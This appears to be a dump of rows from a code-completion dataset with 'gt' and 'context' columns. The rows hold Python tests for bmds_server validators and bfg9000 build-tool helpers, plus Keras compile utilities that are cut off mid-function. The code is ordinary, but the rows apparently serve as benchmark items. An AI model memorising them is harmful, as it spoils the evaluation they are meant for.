gt stringclasses 1
value | context stringlengths 2.49k 119k |
|---|---|
import json
from copy import deepcopy
from typing import Any, Dict
import bmds
import pytest
from bmds.bmds3.recommender import RecommenderSettings
from django.core.exceptions import ValidationError
from bmds_server.analysis import validators
def _missing_field(err, missing_field: str):
data = json.loads(err.value.message)
assert data[0]["loc"] == [missing_field]
assert data[0]["msg"] == "field required"
class TestInputValidation:
def test_bmds3_partial(self):
data: Dict[str, Any] = {
"bmds_version": bmds.constants.BMDS330,
"dataset_type": bmds.constants.CONTINUOUS,
}
# check minimal passes when partial
assert validators.validate_input(data, partial=True) is None
# but fails when complete
with pytest.raises(ValidationError) as err:
validators.validate_input(data)
_missing_field(err, "datasets")
# add datasets, try again
data["datasets"] = [
{
"dtype": "C",
"metadata": {"id": 123},
"doses": [0, 10, 50, 150, 400],
"ns": [111, 142, 143, 93, 42],
"means": [2.112, 2.095, 1.956, 1.587, 1.254],
"stdevs": [0.235, 0.209, 0.231, 0.263, 0.159],
}
]
data["dataset_options"] = [
{"dataset_id": 123, "enabled": True, "degree": 0, "adverse_direction": -1}
]
assert validators.validate_input(data, partial=True) is None
with pytest.raises(ValidationError) as err:
validators.validate_input(data)
_missing_field(err, "models")
# add models, try again
data["models"] = {"frequentist_restricted": [bmds.constants.M_Power]}
assert validators.validate_input(data, partial=True) is None
with pytest.raises(ValidationError) as err:
validators.validate_input(data)
_missing_field(err, "options")
# add options, try again
data["options"] = [
{
"bmr_type": 2,
"bmr_value": 1.0,
"tail_probability": 0.95,
"confidence_level": 0.95,
"dist_type": 1,
}
]
with pytest.raises(ValidationError) as err:
validators.validate_input(data)
_missing_field(err, "rules")
data["recommender"] = RecommenderSettings.build_default().dict()
assert validators.validate_input(data, partial=True) is None
assert validators.validate_input(data) is None
def test_nested_dichotomous(self, nested_dichotomous_datasets):
data: Dict[str, Any] = {
"bmds_version": bmds.constants.BMDS330,
"dataset_type": bmds.constants.NESTED_DICHOTOMOUS,
}
assert validators.validate_input(data, partial=True) is None
# but fails when complete
with pytest.raises(ValidationError) as err:
validators.validate_input(data)
_missing_field(err, "datasets")
# add datasets, try again
data["datasets"] = deepcopy(nested_dichotomous_datasets)
data["dataset_options"] = [{"dataset_id": 123, "enabled": True}]
assert validators.validate_input(data, partial=True) is None
with pytest.raises(ValidationError) as err:
validators.validate_input(data)
_missing_field(err, "models")
# add models, try again
data["models"] = {"frequentist_restricted": [bmds.constants.M_NestedLogistic]}
assert validators.validate_input(data, partial=True) is None
with pytest.raises(ValidationError) as err:
validators.validate_input(data)
_missing_field(err, "options")
# add options, try again
data["options"] = [
{
"bmr_type": 1,
"bmr_value": 1.0,
"confidence_level": 0.95,
"litter_specific_covariate": 1,
"background": 1,
"bootstrap_iterations": 1,
"bootstrap_seed": 0,
}
]
assert validators.validate_input(data, partial=True) is None
with pytest.raises(ValidationError) as err:
validators.validate_input(data)
_missing_field(err, "rules")
data["recommender"] = RecommenderSettings.build_default().dict()
assert validators.validate_input(data, partial=True) is None
assert validators.validate_input(data) is None
def test_multi_tumor(self):
data: Dict[str, Any] = {
"bmds_version": bmds.constants.BMDS330,
"dataset_type": bmds.constants.MULTI_TUMOR,
}
assert validators.validate_input(data, partial=True) is None
# but fails when complete
with pytest.raises(ValidationError) as err:
validators.validate_input(data)
_missing_field(err, "datasets")
# add datasets, try again
data["datasets"] = [
{
"dtype": "D",
"metadata": {"id": 123},
"doses": [0, 10, 50, 150, 400],
"ns": [20, 20, 20, 20, 20],
"incidences": [0, 0, 1, 4, 11],
},
{
"dtype": "D",
"metadata": {"id": 124},
"doses": [0, 10, 50, 150, 400],
"ns": [20, 20, 20, 20, 20],
"incidences": [0, 0, 1, 4, 11],
},
]
data["dataset_options"] = [
{"dataset_id": 123, "enabled": True, "degree": 0},
{"dataset_id": 124, "enabled": True, "degree": 0},
]
assert validators.validate_input(data, partial=True) is None
with pytest.raises(ValidationError) as err:
validators.validate_input(data)
_missing_field(err, "models")
# add models, try again
data["models"] = {"frequentist_restricted": [bmds.constants.M_Multistage]}
assert validators.validate_input(data, partial=True) is None
with pytest.raises(ValidationError) as err:
validators.validate_input(data)
_missing_field(err, "options")
# add options, try again
data["options"] = [
{"bmr_type": 1, "bmr_value": 1.0, "confidence_level": 0.95},
]
assert validators.validate_input(data, partial=True) is None
with pytest.raises(ValidationError) as err:
validators.validate_input(data)
_missing_field(err, "rules")
data["recommender"] = RecommenderSettings.build_default().dict()
assert validators.validate_input(data, partial=True) is None
assert validators.validate_input(data) is None
class TestModelValidation:
def test_bmds3_dichotomous(self):
dtype = bmds.constants.DICHOTOMOUS
probit = bmds.constants.M_Probit
logprobit = bmds.constants.M_LogProbit
# test success
assert validators.validate_models(dtype, {"frequentist_restricted": [logprobit]},) is None
# assert wrong model type
with pytest.raises(ValidationError) as err:
validators.validate_models(
dtype, {"frequentist_restricted": [bmds.constants.M_Power]},
)
assert "Invalid model(s) in frequentist_restricted: Power" in str(err)
# assert duplicates model type
with pytest.raises(ValidationError) as err:
validators.validate_models(
dtype, {"frequentist_restricted": [logprobit, logprobit]},
)
assert "Models in frequentist_restricted are not unique" in str(err)
# assert empty
with pytest.raises(ValidationError) as err:
validators.validate_models(
dtype, {"frequentist_restricted": []},
)
assert "At least one model must be selected" in str(err)
# assert bayesian duplicates
with pytest.raises(ValidationError) as err:
validators.validate_models(
dtype,
{
"bayesian": [
{"model": probit, "prior_weight": 0.3},
{"model": logprobit, "prior_weight": 0.4},
{"model": logprobit, "prior_weight": 0.3},
]
},
)
assert "Models in bayesian are not unique" in str(err)
# assert bayesian prior_weight sum
with pytest.raises(ValidationError) as err:
validators.validate_models(
dtype,
{
"bayesian": [
{"model": probit, "prior_weight": 0.5},
{"model": logprobit, "prior_weight": 0.49},
]
},
)
assert "Prior weight in bayesian does not sum to 1" in str(err.value)
def test_bmds3_continuous(self):
dtype = bmds.constants.CONTINUOUS
power = bmds.constants.M_Power
linear = bmds.constants.M_Linear
# test success
assert validators.validate_models(dtype, {"frequentist_restricted": [power]},) is None
# assert wrong model type
with pytest.raises(ValidationError) as err:
validators.validate_models(
dtype, {"frequentist_restricted": [bmds.constants.M_Probit]},
)
assert "Invalid model(s) in frequentist_restricted: Probit" in str(err)
# assert duplicates model type
with pytest.raises(ValidationError) as err:
validators.validate_models(
dtype, {"frequentist_restricted": [power, power]},
)
assert "Models in frequentist_restricted are not unique" in str(err)
# assert empty
with pytest.raises(ValidationError) as err:
validators.validate_models(
dtype, {"frequentist_restricted": []},
)
assert "At least one model must be selected" in str(err)
# assert bayesian duplicates
with pytest.raises(ValidationError) as err:
validators.validate_models(
dtype,
{
"bayesian": [
{"model": power, "prior_weight": 0.3},
{"model": linear, "prior_weight": 0.4},
{"model": linear, "prior_weight": 0.3},
]
},
)
assert "Models in bayesian are not unique" in str(err)
# assert bayesian prior_weight sum
with pytest.raises(ValidationError) as err:
validators.validate_models(
dtype,
{
"bayesian": [
{"model": power, "prior_weight": 0.5},
{"model": linear, "prior_weight": 0.49},
]
},
)
assert "Prior weight in bayesian does not sum to 1" in str(err.value)
class TestOptionSetValidation:
def test_dichotomous(self):
# test success
data = [dict(bmr_type=1, bmr_value=0.1, confidence_level=0.95)]
assert validators.validate_options(bmds.constants.DICHOTOMOUS, data) is None
# must have at least one option
data = []
with pytest.raises(ValidationError) as err:
validators.validate_options(bmds.constants.DICHOTOMOUS, data)
assert "ensure this value has at least 1 items" in str(err)
def test_continuous(self):
# test success
data = [
{
"bmr_type": 2,
"bmr_value": 1.0,
"tail_probability": 0.95,
"confidence_level": 0.95,
"dist_type": 1,
}
]
assert validators.validate_options(bmds.constants.CONTINUOUS, data) is None
# must have at least one option
data = []
with pytest.raises(ValidationError) as err:
validators.validate_options(bmds.constants.CONTINUOUS, data)
assert "ensure this value has at least 1 items" in str(err)
| |
import re
from unittest import mock
from .. import *
from bfg9000 import shell
from bfg9000.languages import Languages
from bfg9000.path import Root
from bfg9000.tools import cc, common
known_langs = Languages()
with known_langs.make('c') as x:
x.vars(compiler='CC', flags='CFLAGS')
def mock_which(*args, **kwargs):
return ['command']
def mock_execute(args, **kwargs):
if '--version' in args:
return ('g++ (Ubuntu 5.4.0-6ubuntu1~16.04.6) 5.4.0 20160609\n' +
'Copyright (C) 2015 Free Software Foundation, Inc.')
elif '-Wl,--version' in args:
return '', '/usr/bin/ld --version\n'
elif '-print-search-dirs' in args:
return 'libraries: =/lib/search/dir1:/lib/search/dir2\n'
elif '-print-sysroot' in args:
return '/'
elif '--verbose' in args:
return 'SEARCH_DIR("/usr")\n'
raise OSError('unknown command: {}'.format(args))
class TestLibraryMacro(TestCase):
def test_simple(self):
self.assertEqual(common.library_macro('libfoo', 'shared_library'),
'LIBFOO_EXPORTS')
self.assertEqual(common.library_macro('libfoo', 'static_library'),
'LIBFOO_STATIC')
def test_subdir(self):
self.assertEqual(common.library_macro('dir/libfoo', 'shared_library'),
'DIR_LIBFOO_EXPORTS')
self.assertEqual(common.library_macro('dir/libfoo', 'static_library'),
'DIR_LIBFOO_STATIC')
def test_leading_underscore(self):
self.assertEqual(common.library_macro('_dir/libfoo', 'shared_library'),
'LIB_DIR_LIBFOO_EXPORTS')
self.assertEqual(common.library_macro('_dir/libfoo', 'static_library'),
'LIB_DIR_LIBFOO_STATIC')
def test_leading_digits(self):
self.assertEqual(common.library_macro('1/libfoo', 'shared_library'),
'LIB_1_LIBFOO_EXPORTS')
self.assertEqual(common.library_macro('1/libfoo', 'static_library'),
'LIB_1_LIBFOO_STATIC')
class TestMakeCommandConverter(TestCase):
def test_simple(self):
converter = common.make_command_converter([('gcc', 'g++')])
self.assertEqual(converter('gcc'), 'g++')
self.assertEqual(converter('foo-gcc'), 'foo-g++')
self.assertEqual(converter('gcc-foo'), 'g++-foo')
self.assertEqual(converter('foo'), None)
self.assertEqual(converter('foogcc'), None)
self.assertEqual(converter('gccfoo'), None)
def test_order(self):
converter = common.make_command_converter([
('clang-cl', 'clang-cl++'),
('clang', 'clang++'),
])
self.assertEqual(converter('clang'), 'clang++')
self.assertEqual(converter('foo-clang'), 'foo-clang++')
self.assertEqual(converter('clang-foo'), 'clang++-foo')
self.assertEqual(converter('clang-cl'), 'clang-cl++')
self.assertEqual(converter('foo-clang-cl'), 'foo-clang-cl++')
self.assertEqual(converter('clang-cl-foo'), 'clang-cl++-foo')
self.assertEqual(converter('foo'), None)
def test_regex(self):
converter = common.make_command_converter([
(re.compile(r'gcc(?:-[\d.]+)?(?:-(?:posix|win32))?'), 'windres'),
])
self.assertEqual(converter('gcc'), 'windres')
self.assertEqual(converter('gcc-9.1'), 'windres')
self.assertEqual(converter('gcc-posix'), 'windres')
self.assertEqual(converter('gcc-win32'), 'windres')
self.assertEqual(converter('gcc-9.1-posix'), 'windres')
self.assertEqual(converter('gcc-9.1-win32'), 'windres')
self.assertEqual(converter('i686-w64-mingw32-gcc-9.1-win32'),
'i686-w64-mingw32-windres')
def test_pair(self):
c_to_cxx, cxx_to_c = common.make_command_converter_pair([
('gcc', 'g++'),
])
self.assertEqual(c_to_cxx('gcc'), 'g++')
self.assertEqual(c_to_cxx('foo-gcc'), 'foo-g++')
self.assertEqual(c_to_cxx('gcc-foo'), 'g++-foo')
self.assertEqual(c_to_cxx('foo'), None)
self.assertEqual(c_to_cxx('foogcc'), None)
self.assertEqual(c_to_cxx('gccfoo'), None)
self.assertEqual(cxx_to_c('g++'), 'gcc')
self.assertEqual(cxx_to_c('foo-g++'), 'foo-gcc')
self.assertEqual(cxx_to_c('g++-foo'), 'gcc-foo')
self.assertEqual(cxx_to_c('foo'), None)
self.assertEqual(cxx_to_c('foog++'), None)
self.assertEqual(cxx_to_c('g++foo'), None)
def test_invalid_regex(self):
with self.assertRaises(re.error):
common.make_command_converter([(re.compile(r'([\d.]+)'), '')])
class TestNotBuildroot(CrossPlatformTestCase):
def test_none(self):
self.assertFalse(common.not_buildroot(None))
def test_path(self):
self.assertTrue(common.not_buildroot(self.Path('foo')))
self.assertFalse(common.not_buildroot(self.Path('.')))
self.assertTrue(common.not_buildroot(self.Path('.', Root.srcdir)))
def test_misc(self):
self.assertTrue(common.not_buildroot('foo'))
class TestCommand(TestCase):
class MyCommand(common.Command):
def _call(self, cmd, *args):
return cmd + list(args)
def setUp(self):
self.env = make_env(platform='linux')
self.cmd = self.MyCommand(
self.env, command=['mycmd', ['command'], True]
)
def test_call(self):
self.assertEqual(self.cmd(), [self.cmd])
self.assertEqual(self.cmd('--foo'), [self.cmd, '--foo'])
self.assertEqual(self.cmd(cmd='cmd'), ['cmd'])
self.assertEqual(self.cmd('--foo', cmd='cmd'), ['cmd', '--foo'])
def test_run(self):
M = shell.Mode
def assert_called(mock, command, **kwargs):
kwargs.update({'env': self.env.variables,
'base_dirs': self.env.base_dirs})
mock.assert_called_once_with(command, **kwargs)
with mock.patch('bfg9000.shell.execute') as e:
self.cmd.run()
assert_called(e, ['command'], stdout=M.pipe, stderr=M.devnull)
with mock.patch('bfg9000.shell.execute') as e:
self.cmd.run('--foo')
assert_called(e, ['command', '--foo'], stdout=M.pipe,
stderr=M.devnull)
with mock.patch('bfg9000.shell.execute') as e:
self.cmd.run(stdout=M.normal)
assert_called(e, ['command'], stdout=M.normal)
with mock.patch('bfg9000.shell.execute') as e:
self.cmd.run(stdout=M.normal, stderr='err')
assert_called(e, ['command'], stdout=M.normal, stderr='err')
with mock.patch('bfg9000.shell.execute') as e:
self.cmd.run(stdout='out')
assert_called(e, ['command'], stdout='out', stderr=M.devnull)
with mock.patch('bfg9000.shell.execute') as e:
self.cmd.run(stdout='out', stderr='err')
assert_called(e, ['command'], stdout='out', stderr='err')
class TestChooseBuilder(CrossPlatformTestCase):
def __init__(self, *args, **kwargs):
super().__init__(clear_variables=True, *args, **kwargs)
def test_choose(self):
with mock.patch('bfg9000.shell.which', mock_which), \
mock.patch('bfg9000.shell.execute', mock_execute):
builder = common.choose_builder(self.env, known_langs['c'],
(cc.CcBuilder,), candidates='cc')
self.assertEqual(builder.brand, 'gcc')
def test_not_found(self):
def bad_which(*args, **kwargs):
if args[0] == ['cc']:
raise IOError('badness')
else:
return mock_which(*args, **kwargs)
with mock.patch('bfg9000.shell.which', bad_which), \
mock.patch('bfg9000.shell.execute', mock_execute), \
mock.patch('warnings.warn', lambda s: None):
builder = common.choose_builder(self.env, known_langs['c'],
(cc.CcBuilder,), candidates='cc')
self.assertEqual(builder.brand, 'unknown')
def test_nonworking(self):
def bad_execute(args, **kwargs):
raise ValueError()
with mock.patch('bfg9000.shell.which', mock_which), \
mock.patch('bfg9000.shell.execute', bad_execute):
msg = "^no working c compiler found; tried 'cc'$"
with self.assertRaisesRegex(IOError, msg):
common.choose_builder(self.env, known_langs['c'],
(cc.CcBuilder,), candidates='cc')
| |
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Utilites for `Model.compile`."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import copy
import six
from tensorflow.python.distribute import distribution_strategy_context as ds_context
from tensorflow.python.keras import losses as losses_mod
from tensorflow.python.keras import metrics as metrics_mod
from tensorflow.python.keras.utils import generic_utils
from tensorflow.python.keras.utils import losses_utils
from tensorflow.python.keras.utils import tf_utils
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.util import nest
class Container(object):
"""Base Container class."""
def __init__(self, output_names=None):
self._output_names = output_names
def build(self, y_pred):
if self._output_names is None:
# In Subclass API, output names like 'output_1' are used for
# `Metric` names.
self._output_names = create_pseudo_output_names(y_pred)
def _conform_to_outputs(self, outputs, struct):
"""Convenience method to conform `struct` to `outputs` structure.
Mappings performed:
(1) Map a dict to a list of outputs, using the output names.
(2) Fill missing keys in a dict w/ `None`s.
(3) Map a single item to all outputs.
Args:
outputs: Model predictions.
struct: Arbitrary nested structure (e.g. of labels, sample_weights,
losses, or metrics).
Returns:
Mapping of `struct` to `outputs` structure.
"""
struct = map_to_output_names(outputs, self._output_names, struct)
struct = map_missing_dict_keys(outputs, struct)
# Allow passing one object that applies to all outputs.
if not nest.is_nested(struct) and nest.is_nested(outputs):
struct = nest.map_structure(lambda _: struct, outputs)
return struct
def _maybe_broadcast_to_outputs(self, outputs, objects):
"""Determines if losses / metrics should be applied to all outputs.
NOTE: This method should only be called for Metrics / Losses, not for
y_true / sample_weight.
Args:
outputs: Model predictions.
objects: Arbitrary nested structure (e.g. of losses or metrics)
Returns:
Arbitrary nested structure of objects, maybe copied to each output.
Applies a Loss / Metric to all outputs.
"""
if not self._should_broadcast(objects):
return objects
# When there is more than one Model output, this is needed to keep
# each Metric / Loss separate. When there is only one Model output,
# the user-supplied object should be used.
should_copy_objects = len(nest.flatten(outputs)) > 1
def _broadcast_fn():
if should_copy_objects:
return nest.map_structure(self._copy_object, objects)
return objects
return nest.map_structure(lambda _: _broadcast_fn(), outputs)
def _should_broadcast(self, objects):
raise NotImplementedError
def _copy_object(self, obj):
raise NotImplementedError
class LossesContainer(Container):
"""A container class for losses passed to `Model.compile`."""
def __init__(self, losses, loss_weights=None, output_names=None):
super(LossesContainer, self).__init__(output_names=output_names)
# Keep user-supplied values untouched for recompiling and serialization.
self._user_losses = losses
self._user_loss_weights = loss_weights
self._losses = losses
self._loss_weights = loss_weights
self._per_output_metrics = None # Per-output losses become metrics.
self._loss_metric = metrics_mod.Mean(name='loss') # Total loss.
self._built = False
@property
def metrics(self):
"""Per-output loss metrics."""
if not self._built:
return []
per_output_metrics = [
metric_obj for metric_obj in nest.flatten(self._per_output_metrics)
if metric_obj is not None
]
return [self._loss_metric] + per_output_metrics
def build(self, y_pred):
"""One-time setup of loss objects."""
super(LossesContainer, self).build(y_pred)
self._losses = self._maybe_broadcast_to_outputs(y_pred, self._losses)
self._losses = self._conform_to_outputs(y_pred, self._losses)
self._losses = nest.map_structure(self._get_loss_object, self._losses)
self._losses = nest.flatten(self._losses)
self._loss_weights = self._maybe_broadcast_to_outputs(
y_pred, self._loss_weights)
self._loss_weights = self._conform_to_outputs(y_pred, self._loss_weights)
self._loss_weights = nest.flatten(self._loss_weights)
self._create_metrics()
self._built = True
@property
def built(self):
return self._built
def _create_metrics(self):
"""Creates per-output loss metrics, but only for multi-output Models."""
if len(self._output_names) == 1:
self._per_output_metrics = [None]
else:
self._per_output_metrics = []
for loss_obj, output_name in zip(self._losses, self._output_names):
if loss_obj is None:
self._per_output_metrics.append(None)
else:
self._per_output_metrics.append(
metrics_mod.Mean(output_name + '_loss'))
def __call__(self,
y_true,
y_pred,
sample_weight=None,
regularization_losses=None):
"""Computes the overall loss.
Args:
y_true: An arbitrary structure of Tensors representing the ground truth.
y_pred: An arbitrary structure of Tensors representing a Model's outputs.
sample_weight: An arbitrary structure of Tensors representing the
per-sample loss weights. If one Tensor is passed, it is used for all
losses. If multiple Tensors are passed, the structure should match
`y_pred`.
regularization_losses: Additional losses to be added to the total loss.
Returns:
Tuple of `(total_loss, per_output_loss_list)`
"""
y_true = self._conform_to_outputs(y_pred, y_true)
sample_weight = self._conform_to_outputs(y_pred, sample_weight)
if not self._built:
self.build(y_pred)
y_pred = nest.flatten(y_pred)
y_true = nest.flatten(y_true)
sample_weight = nest.flatten(sample_weight)
loss_values = [] # Used for gradient calculation.
loss_metric_values = [] # Used for loss metric calculation.
batch_dim = None
zip_args = (y_true, y_pred, sample_weight, self._losses, self._loss_weights,
self._per_output_metrics)
for y_t, y_p, sw, loss_obj, loss_weight, metric_obj in zip(*zip_args):
if y_t is None or loss_obj is None: # Ok to have no loss for an output.
continue
y_t, y_p, sw = match_dtype_and_rank(y_t, y_p, sw)
sw = apply_mask(y_p, sw, get_mask(y_p))
loss_value = loss_obj(y_t, y_p, sample_weight=sw)
loss_metric_value = loss_value
# Correct for the `Mean` loss metrics counting each replica as a batch.
if loss_obj.reduction == losses_utils.ReductionV2.SUM:
loss_metric_value *= ds_context.get_strategy().num_replicas_in_sync
if batch_dim is None:
if tf_utils.is_ragged(y_t):
batch_dim = y_t.nrows()
else:
batch_dim = array_ops.shape(y_t)[0]
if metric_obj is not None:
metric_obj.update_state(loss_metric_value, sample_weight=batch_dim)
if loss_weight is not None:
loss_value *= loss_weight
loss_metric_value *= loss_weight
if (loss_obj.reduction == losses_utils.ReductionV2.SUM_OVER_BATCH_SIZE or
loss_obj.reduction == losses_utils.ReductionV2.AUTO):
loss_value = losses_utils.scale_loss_for_distribution(loss_value)
loss_values.append(loss_value)
loss_metric_values.append(loss_metric_value)
if regularization_losses:
regularization_losses = losses_utils.cast_losses_to_common_dtype(
regularization_losses)
reg_loss = math_ops.add_n(regularization_losses)
loss_metric_values.append(reg_loss)
loss_values.append(losses_utils.scale_loss_for_distribution(reg_loss))
if loss_values:
loss_metric_values = losses_utils.cast_losses_to_common_dtype(
loss_metric_values)
total_loss_metric_value = math_ops.add_n(loss_metric_values)
self._loss_metric.update_state(
total_loss_metric_value, sample_weight=batch_dim)
loss_values = losses_utils.cast_losses_to_common_dtype(loss_values)
total_loss = math_ops.add_n(loss_values)
return total_loss
else:
# Ok for a model to have no compiled loss.
return array_ops.zeros(shape=())
def reset_states(self):
"""Resets the state of loss metrics."""
if not self._built:
return
metrics = [self._loss_metric] + nest.flatten(self._per_output_metrics)
for metric_obj in metrics:
if metric_obj is not None:
metric_obj.reset_states()
def _get_loss_object(self, loss):
"""Returns a `Loss` object.
Converts the user-supplied loss to a `Loss` object. Also allows
`SUM_OVER_BATCH_SIZE` reduction to be used for this loss.
Args:
loss: A string, function, or `Loss` object.
Returns:
A `Loss` object.
"""
if loss is None:
return None # Ok to have no loss for an output.
loss = losses_mod.get(loss)
if not isinstance(loss, losses_mod.Loss):
loss_name = get_custom_object_name(loss)
if loss_name is None:
raise ValueError('Loss should be a callable, found: {}'.format(loss))
loss = losses_mod.LossFunctionWrapper(loss, name=loss_name)
loss._allow_sum_over_batch_size = True # pylint: disable=protected-access
return loss
def _should_broadcast(self, obj):
return not nest.is_nested(obj)
def _copy_object(self, obj):
return obj # Losses don't need to be copied.
class MetricsContainer(Container):
"""A container class for metrics passed to `Model.compile`."""
def __init__(self, metrics=None, weighted_metrics=None, output_names=None,
from_serialized=False):
"""Initializes a container for metrics.
Arguments:
metrics: see the `metrics` argument from `tf.keras.Model.compile`.
weighted_metrics: see the `weighted_metrics` argument from
`tf.keras.Model.compile`.
output_names: A list of strings of names of outputs for the model.
from_serialized: Whether the model being compiled is from a serialized
model. Used to avoid redundantly applying pre-processing renaming
steps.
"""
super(MetricsContainer, self).__init__(output_names=output_names)
# Keep user-supplied values untouched for recompiling and serialization.
self._user_metrics = metrics
self._user_weighted_metrics = weighted_metrics
self._metrics = metrics
self._weighted_metrics = weighted_metrics
self._built = False
self._from_serialized = from_serialized
@property
def metrics(self):
"""All metrics in this container."""
if not self._built:
return []
return self._metrics_in_order
@property
def unweighted_metrics(self):
"""Metrics in this container that should not be passed `sample_weight`."""
if not self._built:
return None
return nest.flatten(self._metrics)
@property
def weighted_metrics(self):
"""Metrics in this container that should be passed `sample_weight`."""
if not self._built:
return None
return nest.flatten(self._weighted_metrics)
def build(self, y_pred, y_true):
"""One-time setup of metric objects."""
super(MetricsContainer, self).build(y_pred)
self._metrics = self._maybe_broadcast_to_outputs(y_pred, self._metrics)
self._metrics = self._conform_to_outputs(y_pred, self._metrics)
self._weighted_metrics = self._maybe_broadcast_to_outputs(
y_pred, self._weighted_metrics)
self._weighted_metrics = self._conform_to_outputs(y_pred,
self._weighted_metrics)
# Standardize on tuple since `tf.data` turns lists into `Tensor`s.
y_pred = nest.list_to_tuple(y_pred)
y_true = nest.list_to_tuple(y_true)
self._metrics = nest.list_to_tuple(self._metrics)
self._weighted_metrics = nest.list_to_tuple(self._weighted_metrics)
# Convert to `Metric` objects, potentially disambiguating based on output
# properties.
self._metrics = nest.map_structure_up_to(y_pred, self._get_metric_objects,
self._metrics, y_true, y_pred)
self._weighted_metrics = nest.map_structure_up_to(y_pred,
self._get_metric_objects,
self._weighted_metrics,
y_true, y_pred)
self._metrics = nest.flatten_up_to(y_pred, self._metrics, check_types=False)
self._weighted_metrics = nest.flatten_up_to(
y_pred, self._weighted_metrics, check_types=False)
# Assumes metrics, weighted_metrics have been flattened up to outputs.
#
# If we are loading a model that has been already serialized, we do not
# want to re-apply any pre-processing metric renaming steps.
if not self._from_serialized:
self._set_metric_names()
self._create_ordered_metrics()
self._built = True
@property
def built(self):
return self._built
def _set_metric_names(self):
"""Sets unique metric names."""
# For multi-output models, prepend the output name to the metric name.
# For weighted metrics, prepend "weighted_" if the name would be non-unique.
# pylint: disable=protected-access
metric_names = set()
is_multi_output = len(self._output_names) > 1
zip_args = (self._output_names, self._metrics, self._weighted_metrics)
for output_name, output_metrics, weighted_output_metrics in zip(*zip_args):
for m in output_metrics:
if m is None:
continue
if is_multi_output:
m._name = output_name + '_' + m._name
if m._name in metric_names:
raise ValueError('Found two metrics with the same name: {}'.format(
m._name))
metric_names.add(m._name)
for wm in weighted_output_metrics:
if wm is None:
continue
if is_multi_output:
if output_name + '_' + wm._name in metric_names:
wm._name = output_name + '_weighted_' + wm._name
else:
wm._name = output_name + '_' + wm._name
elif wm._name in metric_names:
wm._name = 'weighted_' + wm._name
if wm._name in metric_names:
raise ValueError('Found two metrics with the same name: {}'.format(
wm._name))
metric_names.add(wm._name)
# pylint: enable=protected-access
def _create_ordered_metrics(self):
"""Cache the flat order needed when returning metrics, for backwards compat."""
self._metrics_in_order = []
for output_metrics, output_weighted_metrics in zip(self._metrics,
self._weighted_metrics):
for m in nest.flatten(output_metrics):
if m is not None:
self._metrics_in_order.append(m)
for wm in nest.flatten(output_weighted_metrics):
if wm is not None:
self._metrics_in_order.append(wm)
def update_state(self, y_true, y_pred, sample_weight=None):
"""Updates the state of per-output metrics."""
y_true = self._conform_to_outputs(y_pred, y_true)
sample_weight = self._conform_to_outputs(y_pred, sample_weight)
if not self._built:
self.build(y_pred, y_true)
y_pred = nest.flatten(y_pred)
y_true = nest.flatten(y_true) if y_true is not None else []
sample_weight = nest.flatten(sample_weight)
zip_args = (y_true, y_pred, sample_weight, self._metrics,
self._weighted_metrics)
for y_t, y_p, sw, metric_objs, weighted_metric_objs in zip(*zip_args):
# Ok to have no metrics for an output.
if (y_t is None or (all(m is None for m in metric_objs) and
all(wm is None for wm in weighted_metric_objs))):
continue
y_t, y_p, sw = match_dtype_and_rank(y_t, y_p, sw)
mask = get_mask(y_p)
sw = apply_mask(y_p, sw, mask)
for metric_obj in metric_objs:
if metric_obj is None:
continue
metric_obj.update_state(y_t, y_p, sample_weight=mask)
for weighted_metric_obj in weighted_metric_objs:
if weighted_metric_obj is None:
continue
weighted_metric_obj.update_state(y_t, y_p, sample_weight=sw)
def reset_states(self):
"""Resets the state of all `Metric`s in this container."""
if self._built:
metrics = self._metrics_in_order
else:
# If the user supplied `Metric` objects directly, we should
# reset those. This could also contain `str`s or `function`s
# though.
metrics = nest.flatten(self._user_metrics) + nest.flatten(
self._user_weighted_metrics)
for metric_obj in metrics:
if isinstance(metric_obj, metrics_mod.Metric):
metric_obj.reset_states()
def _get_metric_objects(self, metrics, y_t, y_p):
"""Convert user-supplied metrics to `Metric` objects."""
metrics = nest.flatten(metrics)
return [self._get_metric_object(m, y_t, y_p) for m in metrics]
def _get_metric_object(self, metric, y_t, y_p):
"""Converts user-supplied metric to a `Metric` object.
Args:
metric: A string, function, or `Metric` object.
y_t: Sample of label.
y_p: Sample of output.
Returns:
A `Metric` object.
"""
if metric is None:
return None # Ok to have no metric for an output.
# Convenience feature for selecting b/t binary, categorical,
# and sparse categorical.
if metric not in ['accuracy', 'acc', 'crossentropy', 'ce']:
metric_obj = metrics_mod.get(metric)
else:
y_t_rank = len(y_t.shape.as_list())
y_p_rank = len(y_p.shape.as_list())
y_t_last_dim = y_t.shape.as_list()[-1]
y_p_last_dim = y_p.shape.as_list()[-1]
is_binary = y_p_last_dim == 1
is_sparse_categorical = (
y_t_rank < y_p_rank or y_t_last_dim == 1 and y_p_last_dim > 1)
if metric in ['accuracy', 'acc']:
if is_binary:
metric_obj = metrics_mod.binary_accuracy
elif is_sparse_categorical:
metric_obj = metrics_mod.sparse_categorical_accuracy
else:
metric_obj = metrics_mod.categorical_accuracy
else:
if is_binary:
metric_obj = metrics_mod.binary_crossentropy
elif is_sparse_categorical:
metric_obj = metrics_mod.sparse_categorical_crossentropy
else:
metric_obj = metrics_mod.categorical_crossentropy
if isinstance(metric_obj, losses_mod.Loss):
metric_obj._allow_sum_over_batch_size = True # pylint: disable=protected-access
if not isinstance(metric_obj, metrics_mod.Metric):
if isinstance(metric, six.string_types):
metric_name = metric
else:
metric_name = get_custom_object_name(metric)
if metric_name is None:
raise ValueError(
'Metric should be a callable, found: {}'.format(metric))
metric_obj = metrics_mod.MeanMetricWrapper(metric_obj, name=metric_name)
return metric_obj
def _should_broadcast(self, obj):
# e.g. 'mse'.
if not nest.is_nested(obj):
return True
# e.g. ['mse'] or ['mse', 'mae'].
return (isinstance(obj, (list, tuple)) and
not any(nest.is_nested(o) for o in obj))
def _copy_object(self, obj):
if isinstance(obj, metrics_mod.Metric):
return obj.__class__.from_config(obj.get_config())
return obj # Can be a function or `None`.
def create_pseudo_output_names(outputs):
"""Create pseudo output names for a subclassed Model."""
return _create_pseudo_names(outputs, prefix='output_')
def create_pseudo_input_names(inputs):
